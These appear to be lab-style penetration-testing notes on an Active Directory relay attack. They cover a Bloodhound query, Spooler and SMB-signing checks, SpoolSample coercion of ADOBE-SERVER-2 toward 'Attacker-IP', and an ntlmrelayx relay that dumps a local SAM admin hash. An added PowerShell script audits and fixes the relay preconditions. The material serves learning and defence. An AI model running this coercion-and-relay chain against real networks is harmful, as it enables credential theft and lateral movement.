Automated Relays
Bloodhound
All Windows hosts have a machine account, the user account associated with the host. Unless someone has tampered with the host's account, the passwords of these accounts are uncrackable in practice (they are long and randomly generated by the machine itself).
In AD, these machine accounts are used by several services. Domain Controllers use their machine accounts to synchronize AD updates and changes between each other. When you request a certificate on behalf of the host you are working on, the machine account of that host is used to authenticate to the AD Certificate Service.
There is an exceptional case in AD where one machine has administrator rights over another machine: in the AD configuration, administrative permissions over a host have been granted to another host's machine account.
We are on ADOBE-SERVER-1 with Tier 1 admin privileges.
Bloodhound shows us that the ADOBE-SERVER-2 machine account has administrative privileges over the ADOBE-SERVER-1 machine.
We need to identify cases where a machine account has administrative access over another machine; we can use Bloodhound to accomplish this task.
:: This query finds instances where a Computer has the [AdminTo] relationship over another Computer through group membership (direct or nested)
MATCH p=(c1:Computer)-[r1:MemberOf*1..]->(g:Group)-[r2:AdminTo]->(n:Computer) RETURN p
The Printer Bug
The Printer Bug is a "feature" of the MS-RPRN protocol (Print System Remote Protocol) which allows a domain user to remotely force a target host running the Print Spooler service to authenticate to an arbitrary IP address.
- To exploit it, besides administrative privileges, we need to meet the following conditions:
- A valid set of AD account credentials
- Network connectivity to the target's SMB service
- The target host must be running the Print Spooler service
- The hosts must not have SMB signing enforced
Print Spooler Service
We need to determine whether the Print Spooler service is running. Since we don't have access to ADOBE-SERVER-2, we need to query it from the network perspective.
In this case we can use a WMI query from our session to check the service's current state. The commands below can be used to verify that the service is running.
Commands:
GWMI Win32_Printer -Computer ADOBE-SERVER-2.za.adobe.loc
Get-PrinterPort -ComputerName ADOBE-SERVER-2.za.adobe.loc
Output:
Location     :
Name         : Microsoft XPS Document Writer
PrinterState : 0
PrinterStatus : 3
ShareName    :
SystemName   : ADOBE-SERVER-2

Location     :
Name         : Microsoft Print to PDF
PrinterState : 0
PrinterStatus : 3
ShareName    :
SystemName   : ADOBE-SERVER-2
SMB Signing
In order to relay the coerced authentication attempt, SMB signing must not be enforced on the relay target.
Nmap:
nmap --script=smb2-security-mode -p445 ADOBE-SERVER-1.za.adobe.loc ADOBE-SERVER-2.za.adobe.loc
Output:
Nmap scan report for ADOBE-SERVER-1
PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing Enabled but not Required

Nmap scan report for ADOBE-SERVER-2
PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing Enabled but not Required
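A defender-side counterpart to the two checks above (Print Spooler state and SMB signing enforcement): an added PowerShell audit that is not part of the original notes. It assumes CIM/WinRM access to the hosts and the built-in SmbShare module on them, reuses the hostnames from this page, and its -Remediate switch applies the two fixes that remove the relay preconditions.

```powershell
# Added example (not from the original notes). Assumes CIM/WinRM access to the
# hosts and that the SmbShare module is available on them.
function Test-PrinterBugExposure {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string[]]$ComputerName,
        [switch]$Remediate
    )
    foreach ($computer in $ComputerName) {
        $session = New-CimSession -ComputerName $computer -ErrorAction Stop
        try {
            # Precondition 1: the Spooler service is running, so MS-RPRN is reachable
            $spooler = Get-CimInstance -CimSession $session -ClassName Win32_Service `
                -Filter "Name='Spooler'"
            # Precondition 2: the SMB server does not require message signing
            $smb = Get-SmbServerConfiguration -CimSession $session
            $exposed = ($spooler.State -eq 'Running') -and (-not $smb.RequireSecuritySignature)

            if ($Remediate) {
                if ($spooler.State -eq 'Running') {
                    # Stop and disable the Spooler on hosts that do not need to print
                    Invoke-CimMethod -InputObject $spooler -MethodName StopService | Out-Null
                    Invoke-CimMethod -InputObject $spooler -MethodName ChangeStartMode `
                        -Arguments @{ StartMode = 'Disabled' } | Out-Null
                }
                if (-not $smb.RequireSecuritySignature) {
                    # Require SMB signing so a relayed NTLM session is rejected
                    Set-SmbServerConfiguration -CimSession $session `
                        -RequireSecuritySignature $true -Force
                }
            }

            # Report the state as found (before any remediation was applied)
            [pscustomobject]@{
                ComputerName             = $computer
                SpoolerState             = $spooler.State
                SpoolerStartMode         = $spooler.StartMode
                RequireSecuritySignature = [bool]$smb.RequireSecuritySignature
                RelayExposed             = $exposed
            }
        }
        finally { Remove-CimSession $session }
    }
}

# Audit the two hosts from the notes above; add -Remediate to apply the fixes
Test-PrinterBugExposure -ComputerName 'ADOBE-SERVER-1.za.adobe.loc', 'ADOBE-SERVER-2.za.adobe.loc' |
    Format-Table -AutoSize
```

RelayExposed is true only when both preconditions hold on a host; for the relay target it is the signing setting that matters, for the coerced host the Spooler state.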
Exploiting Authentication Relays
Abusing the Print Spooler service may cause it to crash, and a callback is not always guaranteed.
SpoolSample can be used to exploit authentication relays. The exploit should be compiled and transferred to the target machine.
We will run SpoolSample from the Windows machine to coerce ADOBE-SERVER-2 into authenticating to our attacker machine, and then use ntlmrelayx to relay the authentication attempt to ADOBE-SERVER-1.
When ADOBE-SERVER-2 makes the authentication attempt against ADOBE-SERVER-1, ntlmrelayx dumps the local SAM hashes if no command was specified.
Attacker machine:
:: Commands can be specified with [-c]
ntlmrelayx -smb2support -t smb://ADOBE-SERVER-1 -debug
Windows machine:
:: Connect to the attacker
SpoolSample ADOBE-SERVER-2.za.adobe.loc "Attacker-IP"
Output from ntlmrelayx on the attacker machine. The hashes can be used to attempt remote authentication with tools such as Evil-WinRM, PsExec, etc.
[...]
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[+] Calculating HashedBootKey from SAM
[+] NewStyle hashes is: True
ServerAdmin:500:aad3b435b51404eeaad3b435b51404ee:3279a0c6dfe15dc3fb6e9c26dd9b066c:::
[...]